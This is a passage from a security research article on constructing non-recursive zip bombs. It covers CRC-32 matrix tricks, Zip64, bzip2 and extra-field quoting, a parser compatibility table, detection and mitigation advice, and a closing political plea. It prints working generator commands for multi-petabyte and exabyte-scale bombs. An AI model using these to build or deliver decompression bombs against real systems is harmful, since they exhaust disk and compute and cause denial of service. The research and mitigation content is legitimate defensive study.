0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 |
1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
state >> 1
.Both operations crc32_update_0
and crc32_update_1
can be represented by a 33ร33 transformation matrix. The matrices M0 and M1 are shown. The benefit of a matrix representation is that matrices compose. Suppose we want to represent the state change effected by processing the ASCII character 'a', whose binary representation is 011000012. We can represent the cumulative CRC-32 state change of those 8 bits in a single transformation matrix:
Ma | = M0 M1 M1 M0 M0 M0 M0 M1 |
And we can represent the state change of a string of repeated 'a's by multiplying many copies of Ma togetherโmatrix exponentiation. We can do matrix exponentiation quickly using a square-and-multiply algorithm, which allows us to compute Mn in only about log2โฏn steps. For example, the matrix representing the state change of a string of 9 'a's is
(Ma )9 | = Ma Ma Ma Ma Ma Ma Ma Ma Ma |
= (Ma Ma Ma Ma )2 Ma | |
= ((Ma Ma )2)2 Ma | |
= (((Ma )2)2)2 Ma |
The square-and-multiply algorithm is useful for computing Mkernel, the matrix for the uncompressed kernel, because the kernel is a string of repeated bytes. To produce a CRC-32 checksum value from a matrix, multiply the matrix by the zero vector. (The zero vector in homogeneous coordinates, that is: 32 0's followed by a 1. Here we omit the minor complication of pre- and post-conditioning the checksum.) To compute the checksum for every file, we work backwards. Start by initializing M := Mkernel. The checksum of the kernel is also the checksum of the final file, file N, so multiply M by the zero vector and store the resulting checksum in CDHN and LFHN. The file data of file N โ 1 is the same as the file data of file N, but with an added prefix of LFHN. So compute MLFHN, the state change matrix for LFHN, and update M := M MLFHN. Now M represents the cumulative state change from processing LFHN followed by the kernel. Compute the checksum for file N โ 1 by again multiplying M by the zero vector. Continue the procedure, accumulating state change matrices into M, until all the files have been processed.
Extension: Zip64
Earlier we hit a wall on expansion due to limits of the zip formatโit was impossible to produce more than about 281 TB of output, no matter how cleverly packed the zip file. It is possible to surpass those limits using Zip64, an extension to the zip format that increases the size of certain header fields to 64 bits. Support for Zip64 is by no means universal, but it is one of the more commonly implemented extensions. As regards the compression ratio, the effect of Zip64 is to increase the size of a central directory header from 46 bytes to 58 bytes, and the size of a local directory header from 30 bytes to 50 bytes. Referring to the formula for optimal expansion in the simplified model, we see that a zip bomb in Zip64 format still grows quadratically, but more slowly because of the larger denominatorโthis is visible in the figure below in the Zip64 line's slightly lower vertical placement. In exchange for the loss of compatibility and slower growth, we get the removal of all practical file size limits.
Suppose we want a zip bomb that expands to4.5 PB, the same size that 42.zip recursively expands to. How big must the zip file be? Using binary search, we find that the smallest zip file whose unzipped size exceeds the unzipped size of 42.zip has a zipped size of46 MB.
zipbomb --mode=quoted_overlap --num-files=190023 --compressed-size=22982788 --zip64 > zbxl.zip
4.5 PB is roughly the size of the data captured by the Event Horizon Telescope to make the first image of a black hole, stacks and stacks of hard drives.
With Zip64, it's no longer practically interesting to consider the maximum compression ratio, because we can just keep increasing the zip file size, and the compression ratio along with it, until even the compressed zip file is prohibitively large. An interesting threshold, though, is264 bytes(18 EBor16 EiB)โthat much data will not fit on most filesystems. Binary search finds the smallest zip bomb that produces at least that much output: it contains12 millionfiles and has a compressed kernel of1.5 GB. The total size of the zip file is2.9 GBand it unzips to264 + 11โฏ727โฏ895โฏ877 bytes, having a compression ratio of over6.2 billion. I didn't make this one downloadable, but you can generate it yourself using the source code. It contains files so large that it uncovers a bug in Info-ZIP UnZip 6.0.
zipbomb --mode=quoted_overlap --num-files=12056313 --compressed-size=1482284040 --zip64 > zbxxl.zip
Extension: bzip2
DEFLATE is the most common compression algorithm used in the zip format, but it is only one of many options. Probably the second most common algorithm is bzip2, while not as compatible as DEFLATE, is probably the second most commonly supported compression algorithm. Empirically, bzip2 has a maximum compression ratio of about 1.4 million, which allows for denser packing of the kernel. Ignoring the loss of compatibility, does bzip2 enable a more efficient zip bomb?
Yesโbut only for small files. The problem is that bzip2 does not have anything like the non-compressed blocks of DEFLATE that we used to quote local file headers. So it is not possible to overlap files and reuse the kernelโeach file must have its own copy, and therefore the overall compression ratio is no better than the ratio of any single file. In the figure we see that no-overlap bzip2 outperforms quoted DEFLATE only for files under about a megabyte.
There is still hope for using bzip2โan alternative means of local file header quoting discussed in the next section. Additionally, if you happen to know that a certain zip parser supports bzip2 and tolerates mismatched filenames, then you can use the full-overlap construction, which has no need for quoting.
Extension: extra-field quoting
So far we have used a feature of DEFLATE to quote local file headers, and we have just seen that the same trick does not work with bzip2. There is an alternative means of quoting, somewhat more limited, that only uses features of the zip format and does not depend on the compression algorithm.
At the end of the local file header structure there is a variable-length extra field whose purpose is to store information that doesn't fit into the ordinary fields of the header (APPNOTE.TXT section 4.3.7). The extra information may include, for example, a high-resolution timestamp or a Unix uid/gid; Zip64 information is stored in the extra field. The extra field is represented as a lengthโvalue structure; if we increase the length field without adding to the value, then the extra field will grow to include whatever comes after it in the zip fileโnamely the next local file header. Using this technique, each local file header can "quote" the following local file headers by enclosing them within its own extra field. The benefits of extra-field quoting, as compared to DEFLATE non-compressed block quoting, are threefold:
- Extra-field quoting requires only 4 bytes of overhead, not 5, leaving more room for the kernel.
- Extra-field quoting does not increase the size of files, which leaves more headroom for a bigger kernel when operating at the limits of the zip format.
- Extra-field quoting provides a way of combining quoting with bzip2.
Despite these benefits, extra-field quoting is less flexible than DEFLATE quoting. It does not chain like DEFLATE quoting does: each local file header must enclose not only the immediately next header but all headers which follow. The extra fields increase in length as they get closer to the beginning of the zip file. Because the extra field has a maximum length of216 โ 1 bytes, it is only possible to quote up to 1808 local file headers (or 1170 with Zip64), assuming that filenames are allocated as described. (In the case of DEFLATE, you can use extra-field quoting for the first (shortest) local file headers, then switch to DEFLATE quoting for the remainder.) Another problem is that, in order to conform to the internal data structure of the extra field, you must select a 16-bit type tag (APPNOTE.TXT section 4.5.2). to precede the quoted data. We want to choose a type tag that will cause parsers to ignore the quoted data, rather than trying to interpret it as meaningful metadata. Zip parsers are supposed to ignore unknown type tags, so we could choose a type tag at random, but there is the risk that the tag may be allocated in the future, breaking the compatibility of the construction.
The figure illustrates the possibility of using extra-field quoting with bzip2, with and without Zip64. Both lines have a knee at which the growth transitions from quadratic to linear. In the non-Zip64 case, the knee occurs where the maximum uncompressed file size (232 โ 2 bytes) is reached; after this point, one can only increase the number of files, not their size. The line ends completely when the number of files reaches 1809, when we run out of room in the extra field to quote quote additional headers. In the Zip64 case, the knee occurs at 1171 files, after which the size of files can be increased but not their number. Extra-field quoting also helps in the case of DEFLATE, but the difference is so slight as to be visually imperceptible and so it has been omitted from the figure. It increases the compression ratio of zbsm.zip by 1.2%; zblg.zip by 0.019%; and zbxl.zip by 0.0025%.
Discussion
In related work, Plรถtz et al. used overlapping files to create a near-self-replicating zip file. Gynvael Coldwind has previously suggested (slide 47) overlapping files.
We have designed the quoted-overlap zip bomb construction for compatibility, taking into consideration a number of implementation differences, some of which are shown in the table below. The resulting construction is compatible with zip parsers that work in the usual back-to-front way, first consulting the central directory and using it as an index of files. Among these is the example zip parser included in Nail, which is automatically generated from a formal grammar. The construction is not compatible, however, with "streaming" parsers, those that parse the zip file from beginning to end in one pass without first reading the central directory. By their nature, streaming parsers do not permit any kind of file overlapping. The most likely outcome is that they will extract only the first file. They may even raise an error besides, as is the case with sunzip, which parses the central directory at the end and checks it for consistency with the local file headers it has already seen.
If you need the extracted files to start with a certain prefix other than the bytes of a local file header, you can insert a DEFLATE block before the non-compressed block that quotes the next header. Not every file in the zip file has to participate in the bomb construction: you can also include ordinary files if needed to conform to some special format. (The source code has a --template
option to facilitate this use case.) Many file formats use zip as a container; examples are Java JAR, Android APK, and LibreOffice documents.
PDF is in many ways similar to zip. It has a cross-reference table at the end of the file that points to objects earlier in the file, and it supports DEFLATE compression of objects through the FlateDecode filter. I haven't tried it, but it may be possible to use the quoted-overlap idea to make a PDF compression bomb. It may not even be necessary to work that hard: binaryhax0r suggests in a blog post that one can simply specify multiple layers of FlateDecode on a single object, which makes a compression bomb easy.
Detecting the specific class of zip bomb we have developed in this article is easy: just look for overlapping files. Mark Adler has written a patch for Info-ZIP UnZip that does just that. In general, though, rejecting overlapping files does not protect against all classes of zip bomb. It is difficult to predict in advance whether a zip file is a bomb or not, unless you have precise knowledge of the internals of the parsers that will be used to parse it. Peeking into the headers and summing the "uncompressed size" fields of all files does not work, in general, because the value stored in the headers may not agree with the actual uncompressed size. (See the "permits too-short file size" row in the compatibility table.) Robust protection against zip bombs involves placing time, memory, and disk space limits on the zip parser while it operates. Handle zip parsing, as any complex operation on untrusted data, with caution.
Info-ZIP UnZip 6.0 | Python 3.7 zipfile | Go 1.12 archive/zip | yauzl 2.10.0 (Node.js) | Nail examples/zip | Android 9.0.0 r1 libziparchive | sunzip 0.4 (streaming) | |
---|---|---|---|---|---|---|---|
DEFLATE | โ | โ | โ | โ | โ | โ | โ |
Zip64 | โ | โ | โ | โ | โ | โ | โ |
bzip2 | โ | โ | โ | โ | โ | โ | โ |
permits mismatched filenames | warns | โ | โ | โ | โ | โ | โ |
permits incorrect CRC-32 | warns | โ | if zero | โ | โ | โ | โ |
permits too-short file size | โ | โ | โ | โ | โ | โ | โ |
permits file size of 232 โ 1 | โ | โ | โ | โ | โ | โ | โ |
permits file count of 216 โ 1 | โ | โ | โ | โ | โ | โ | โ |
unzips overlap.zip | warns | โ | โ | โ | โ | โ | โ |
unzips zbsm.zip and zblg.zip | โ | โ | โ | โ | โ | โ | โ |
unzips zbxl.zip | โ | โ | โ | โ | โ | โ | โ |
Credits
I thank Mark Adler, Russ Cox, Brandon Enright, Marek Majkowski, and Josh Wolfe for comments on a draft of this article. Caolรกn McNamara evaluated the security impact of the zip bombs in LibreOffice.
Did you find a system that chokes on one of these zip bombs? Did they help you demonstrate a vulnerability or win a bug bounty? Let me know and I'll try to mention it here.
- LibreOffice 6.1.5.2
- zblg.zip renamed to zblg.odt or zblg.docx will cause LibreOffice to create and delete a number of ~4 GB temporary files as it attempts to determine the file format. It does eventually finish, and it deletes the temporary files as it goes, so it doesn't fill up the disk. Caolรกn McNamara replied to my bug report.
- Mozilla addons-server 2019.06.06
- I tried the zip bombs against a local installation of addons-server, which is part of the software behind addons.mozilla.org. The system handles it gracefully, imposing a time limit of 110 s on extraction. The zip bomb expands as fast as the disk will let it up to the time limit, but after that point the process is killed and the unzipped files are eventually automatically cleaned up.
- UnZip 6.0
- Mark Adler wrote a patch for UnZip to detect this class of zip bomb.
A version of this article will appear in the USENIX WOOT 2019 workshop. The source code of the paper is available. The artifacts prepared for submission are zipbomb-woot19.zip.
A final plea
It's time to put an end to Facebook. Working there is not ethically neutral: every day that you go into work, you are doing something wrong. If you have a Facebook account, delete it. If you work at Facebook, quit.
And let us not forget that the National Security Agency must be destroyed.